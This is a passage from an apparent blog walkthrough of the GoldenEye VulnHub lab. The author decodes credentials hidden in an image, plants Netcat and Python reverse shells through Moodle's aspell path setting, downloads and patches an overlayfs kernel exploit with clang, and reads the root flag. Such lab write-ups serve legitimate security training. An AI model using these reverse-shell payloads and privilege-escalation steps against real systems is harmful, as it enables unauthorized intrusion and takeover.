Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’
for-007.jpg 100%[===================================================================================================================================================>] 14.55K --.-KB/s in 0s
2018-08-16 22:37:28 (218 MB/s) - ‘for-007.jpg’ saved [14896/14896]
root@kali:~/Documents/vulnhub/goldeneye# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
Image Description |eFdpbnRlcjE5OTV4IQ==
Manufacturer |GoldenEye
Resolution Unit |Inch
Software |linux
Artist |For James
YCbCr Positioning |Centered
X-Resolution |72
Y-Resolution |72
Exif Version |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment |For 007
FlashPixVersion |FlashPix Version 1.0
Color Space |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
Hmmm that image description looks suss! Lets base64 decode it...
root@kali:~/Documents/vulnhub/goldeneye# echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!
root@kali:~/Documents/vulnhub/goldeneye#
OK, now that looks like creds to me...
Maybe for the admin user? My hydra completed without finding anything for the admin user. But lets try admin user with these new creds...
Winner winner
There's a bit to look at with admin settings, but I come across a system paths settings, where you can set a path to aspell, du and dot. Looks like you can enter system paths! Googling around, this looks like a known vector of attack for code execution.
I start a listener:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
And I try updating the aspellpath to perform a reverse shell (hoping nc is installed).
sh -c '(nc 192.168.253.130 443 -e /bin/sh &)'
I create a blog post and run spellchecker. Hmm nothing...
Digging further in the settings, looks like the spellchecker is defaulted to use google, rather than a custom spell checker program, as we configured.
Now lets change this to PSpellShell.
So I spent hours, trying all sorts of reverse shell combos with no success. I went through my usual go to list below:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Nothing was working. I later released my goldeneye vm was configured to use host only networking and my Kali machine was using a NAT adapter.
This meant I could use my hosts physical adapter to access my internet and also access the goldeneye vm. However, there was not route back for my reverse shell to connect back too.
I changed my Kali machine to a host only adapter, on the same subnet as goldeneye.
My new kali IP is now 192.168.111.129.
Update the aspellshell path:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Hit spell check on a nonsense new blog:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.111.129] from severnaya-station.com [192.168.111.128] 48560
/bin/sh: 0: can't access tty; job control turned off
$
BINGO!
--> TIME TO PE
Change over to a python tty shell and see what we're working with...
$ python -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /
cd /
www-data@ubuntu:/$ hostname
hostname
ubuntu
www-data@ubuntu:/$ uname -ra
uname -ra
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
www-data@ubuntu:/$ ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:2e:e5:d4
inet addr:192.168.111.128 Bcast:192.168.111.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe2e:e5d4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:323 errors:0 dropped:0 overruns:0 frame:0
TX packets:679 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52359 (52.3 KB) TX bytes:1058811 (1.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10760 errors:0 dropped:0 overruns:0 frame:0
TX packets:10760 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6139626 (6.1 MB) TX bytes:6139626 (6.1 MB)
www-data@ubuntu:/$
So Ubuntu 14.04.1 running Linux Kernel 3.13.0-32 64 bit....
I check out the directories in which the site is being hosted.
Looks like I found a new page:
www-data@ubuntu:/var/www/html$ ls -l
ls -l
total 264
drwxr-xr-x 3 www-data www-data 4096 Apr 25 07:29 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
www-data@ubuntu:/var/www/html$ dir 006-final
dir 006-final
sata_drop.webm sata_drop.webm.1 x8vtfinal-flag.gif xvf7-flag
www-data@ubuntu:/var/www/html$
Lets check them in firefox:
Hahaha nice:
Quick look around I don't see anything exciting to move me forward....
What else do we have?
www-data@ubuntu:/var/www/html$ ls -la
ls -la
total 272
drwxr-xr-x 6 root root 4096 Apr 29 10:18 .
drwxr-xr-x 4 root root 4096 Apr 23 20:56 ..
drwxr-xr-x 3 www-data www-data 4096 Aug 16 20:53 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
Looking at the root I find sniper.jpg...
Ahhh makes me wanna play Goldeneye...
Lets check the exif data on this one...
Nah nothing...
So I check out splashAdmin.php:
Hard to read, but the line that sounds most interesting is: "For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. I've replaced GCC with this throughout the GolenEye systems. "
I'll keep that in mind. I keep looking through the file system, especially under /var/www and find some uploaded files through moodle:
-rw-rw-rw- 1 www-data www-data 168 Apr 23 21:16 warning.txt
./05:
total 4
drwxrwsrwx 2 www-data www-data 4096 Aug 15 19:46 6d
./05/6d:
total 8
-rw-rw-rw- 1 www-data www-data 4795 Aug 15 19:46 056d495e4768cf97825602ed6a1096eab6d67a5a
./82:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 34
./82/34:
total 1496
-rw-rw-rw- 1 www-data www-data 1529575 Apr 24 16:10 82341a17005e75a8f4614ea435acbc3148cf30ea
./a6:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:15 f9
./a6/f9:
total 4
-rw-rw-rw- 1 www-data www-data 3242 Apr 24 16:15 a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
./ad:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 18:28 5c
./ad/5c:
total 4
-rw-rw-rw- 1 www-data www-data 364 Apr 24 18:28 ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
./da:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 39
./da/39:
total 0
-rw-rw-rw- 1 www-data www-data 0 Apr 24 16:10 da39a3ee5e6b4b0d3255bfef95601890afd80709
www-data@ubuntu:/var/www/moodledata/filedir$
First one is an attempted php moodle exploit I tried previously.
www-data@ubuntu:/var/www/moodledata/filedir/05/6d$ file 82341a17005e75a8f4614ea435acbc3148cf30ea BORIS GIF
82341a17005e75a8f4614ea435acbc3148cf30ea: GIF image data, version 89a, 500 x 278
www-data@ubuntu:/var/www/moodledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d NATALYA GIF
<odledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d: JPEG image data, JFIF standard 1.01
www-data@ubuntu:/var/www/moodledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
<odledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
ad5c3bc9ae900b39509eb2d6a727455e39d77b9b: ASCII text, with CRLF line terminators
^Just contained this text message:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
Last one is empty:
www-data@ubuntu:/var/www/moodledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
<odledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
da39a3ee5e6b4b0d3255bfef95601890afd80709: empty
Nothing fun here...
Going back to the Linux version, let check what kernel exploits we have available for 3.13.0:
root@kali:~/Documents/vulnhub/goldeneye# searchsploit Linux Kernel 3.13.0
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | exploits/linux/local/37293.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
hmm lets have a look... I've used this one before. However, it relies on gcc for compiling.
Based on the message I read earlier, quick google: "freebsd gcc equivalent clang"
https://unix.stackexchange.com/questions/49906/why-is-freebsd-deprecating-gcc-in-favor-of-clang-llvm
After briefly reading, it seems clang is a compatible compiler... Hmm lets try this!
Host it on my kali machine:
root@kali:~/Documents/vulnhub/goldeneye# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/Documents/vulnhub/goldeneye# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Download and compile:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292.c
wget http://192.168.111.129/37292.c
--2018-08-19 02:52:53-- http://192.168.111.129/37292.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
100%[======================================>] 5,119 --.-K/s in 0s
2018-08-19 02:52:53 (1013 MB/s) - '37292.c' saved [5119/5119]
www-data@ubuntu:/tmp$ which cc
which cc
/usr/bin/cc
www-data@ubuntu:/tmp$ which clang
which clang
/usr/bin/clang
www-data@ubuntu:/tmp$ clang 37292.c -o a
clang 37292.c -o a
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls
ls
37292.c a vmware-root
www-data@ubuntu:/tmp$
Hmmm that looked easy?
Lets see?
www-data@ubuntu:/tmp$ ./a
./a
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
www-data@ubuntu:/tmp$
Hmm gcc not found? Let's check the exploit code...
Line 143:
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
I edit this and replace it with clang
Let's re-download that now:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292_edited.c
wget http://192.168.111.129/37292_edited.c
--2018-08-19 02:58:49-- http://192.168.111.129/37292_edited.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: '37292_edited.c'
100%[======================================>] 5,123 --.-K/s in 0s
2018-08-19 02:58:49 (10.9 MB/s) - '37292_edited.c' saved [5123/5123]
Recompile again:
www-data@ubuntu:/tmp$ clang 37292_edited.c -o b
clang 37292_edited.c -o b
37292_edited.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292_edited.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292_edited.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292_edited.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292_edited.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls -l
ls -l
total 76
-rw-rw-rw- 1 www-data www-data 5119 Aug 19 02:47 37292.c
-rw-rw-rw- 1 www-data www-data 5123 Aug 19 02:58 37292_edited.c
-rwxrwxrwx 1 www-data www-data 13773 Aug 19 02:53 a
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:58 a.out
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:59 b
drwxrwxrwx 5 www-data www-data 4096 Aug 19 02:54 ns_sploit
-rwxrwxrwx 1 www-data www-data 418 Aug 19 02:54 ofs-lib.c
drwx------ 2 root root 4096 Aug 19 01:19 vmware-root
Let's see what happens now:
www-data@ubuntu:/tmp$ ./b
./b
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
FINALLY! YES!!!!!
Now for the flag:
# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 19:28 .
drwxr-xr-x 22 root root 4096 Apr 24 21:57 ..
-rw-r--r-- 1 root root 19 May 3 10:08 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 11:00 .cache
-rw------- 1 root root 144 Apr 29 19:16 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 20:23 .rnd
-rw------- 1 root root 8296 Apr 29 10:18 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
Another one down.
I'm going to have to see how much a N64 goes for on eBay now!
--> n33dle
Subscribe to:
Posts (Atom)